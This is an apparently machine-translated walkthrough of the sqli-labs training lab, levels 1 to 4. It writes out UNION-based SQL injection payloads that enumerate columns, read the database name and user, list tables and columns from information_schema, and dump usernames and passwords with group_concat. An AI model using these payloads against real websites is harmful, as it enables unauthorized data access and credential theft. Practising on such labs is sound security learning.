What is? sql-labs？

SQL Inject （SQL Injection） It happened in Web Security vulnerabilities in the database layer of the program , It is the website that has the most and simplest vulnerabilities . The main reason is that the program does not judge and process the legitimacy of user input data , Cause attackers to be able to Web Predefined in the application SQL Add additional... To the statement SQL sentence , Implement illegal operation without the administrator's knowledge , In this way, the database server is cheated to execute any unauthorized query , So as to further obtain data information
Recommend a video 【 Reprint 】SQL Inject 、SSTI&Docker The escape HTB CTF -GoodGame- Bili, Bili

Pass-01,02

These two things , No bad …
Online inquiries have Pass-01 Based on single quotation marks SQL Inject ,Pass-02 Integer based injection

Determine whether there is injection

use get Pass value id=1, Then you can see the web page changes
use get Pass value id=2,

use get Pass value id=15 after , The interface is abnormal .

Is it possible to ?id=1, This pass parameter is spliced to SQL In the sentence ？ And be regarded as SQL Code execution ？
Try ,?id=1 and 1=2… unchanged .

Pass-02 Knowledge starts from this , Try to close ?id=1’and 1=1-- za（ Follow the letter casually …）

Note blank space （ Format ）, Otherwise, an error will be reported , Pictured

?id=1’and 1=2-- zaa, Page exception （ Possible SQL Inject ）

Determine the number of fields

Use order by Query all fields , from 1 Start until 4, Find out 3 normal , however 4 The page of is abnormal （ There are three fields ）

union select The judgment is obviously misplaced （ The echo ）

Input ,?id=1’union select 1,2,3-- zaa, The previous results are shown ,
1,2,3: It's only equivalent to occupying three positions （ previously order by Query as 3）, So you can use whatever expression .

So try to id=1, Change it to id=15( Because the page has no result )

Be careful ： The article said , It is known that there are only three columns , Find the position of each column , Use ?id=0’ union select 1,2,3 --+ （ It should be noted that the id The value must be 0 The following figures , Otherwise, it will not succeed ）

Library name and login user name

take 2 Change your position to database(), Display the database name of the current page ：security.

Query the database name and current login user name of the current database , Use ?id=0’ union select 1,database(),user() – zaa
user() displacement 3 The location of , Is the current login user name .

Name of judgment table

?id=15’union select 1,table_name,3 from information_schema.tables where table_schema=‘security’-- zaa

Second （ Then the first one can be used limit 0,1 Express ）
?id=15’union select 1,table_name,3 from information_schema.tables where table_schema=‘security’ limit 1,1– zaa

Third （limit 1,1 In front of 1 Change it to 2）
namely …?id=15’union select 1,table_name,3 from information_schema.tables where table_schema=‘security’ limit 2,1-- zaa

etc. …

Judge the listing

?id=15’union select 1,column_name,3 from information_schema.columns where table_schema=‘security’ and table_name=‘emails’-- zaa
emails： It can be replaced according to the table

example ：
?id=15’union select 1,column_name,3 from information_schema.columns where table_schema=‘security’ and table_name=‘referers’-- zaa

Judgment data

?id=15’union select 1,id,3 from emails-- zaa

Same as above ,emails： It can be replaced according to the table

Quick method （ It should be noted that the id The value must be 0 The following figures , Otherwise, it will not succeed ）

take 2 Change your position to database(), Display database name ：security.
Reference article …

Table name

The database will be exploded after the database name , Use ?id=0’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),3 --+

The table name is in place in one step …

Name

?id=0’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘emails’),3 --+
emails： It can be replaced according to the table

Data name

Format ?id=0’ union select 1,(select group_concat(concat_ws(0x7e, The column name corresponding to the table name , The column name corresponding to the table name )) from Table name ),3 --+
0x7e It should be standing …, Its position can also be the column name corresponding to the table name , Observe 02,03

01

?id=0’ union select 1,(select group_concat(concat_ws(0x7e,id,email_id)) from emails),3 --+ Blasting , Get the following .

02

?id=0’ union select 1,(select group_concat(concat_ws(0x7e,username,password)) from users),3 --+ Blasting , Get the following .

03

?id=0’ union select 1,(select group_concat(concat_ws(id,username,password)) from users),3 --+ Blasting , Get the following

Pass-03

View source code … Found framed . Will not be treated as code , Thus invalidating the code .
thus ’ Add a )

Pass-04

From figure and 03 Compared with single quotation, it becomes double quotation marks …